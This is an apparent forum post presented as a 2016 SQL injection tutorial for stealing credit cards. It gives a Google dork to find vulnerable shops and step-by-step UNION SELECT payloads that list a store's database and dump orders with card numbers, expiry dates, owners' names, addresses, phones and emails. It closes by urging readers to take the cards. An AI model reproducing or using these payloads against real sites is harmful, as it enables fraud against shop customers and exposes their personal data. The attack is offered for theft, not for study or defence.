(CC Hacking)New SQL Injection Tutorials 2016

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker)..This is new Tutorial.by me for hacking CC

1) we got to search google for webshops , I used this dork :

Code:

inurl:customer_testimonials.php testimonial_id=

2)lets say we got this site 

Code:

http://www.JustExample.com/customer_...stimonial_id=7

3) we got to check if its vulnerable to SQLi , we add this 

Code:

'

to url :

>>>

Code:

http://www.JustExample.com/customer_...stimonial_id=7'

if we get a error means website its vuln.

4) we have to check for column number we try with 10 first 

Code:

+order+by+10-

- :

>>>

Code:

http://www.JustExample.com/customer_...+order+by+10--

if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns

5 )this time we get a error now we try from 1 to 9 

Code:

+union+select+1,2,3,4,5,6,7,8,9--

>>>

Code:

http://www.JustExample.com/customer_...,4,5,6,7,8,9--

now we found it the website has 9 columns

6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :

*- database user

Code:

http://www.JustExample.com/customer_...,4,5,6,7,8,9--

*- database name

Code:

http://www.JustExample.com/customer_...,4,5,6,7,8,9--

*- database version

Code:

http://www.JustExample.com/customer_...,4,5,6,7,8,9--

7) we need the table names we add this to url :

Code:

+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--

Code:

http://www.JustExample.com/customer_...chema.tables--

now we need columns : we add this to url :

Code:

+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--

>>>

Code:

http://www.JustExample.com/customer_...hema.columns--

9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......

Code:

+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--

>>>

Code:

http://www.JustExample.com/customer_...+from+orders--

if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them

Code:

+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+

>>>

Code:

/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+

now one step left

10 ) get the credit cards and have fun....

Don't forget to use your brain......

ENJOY !!!!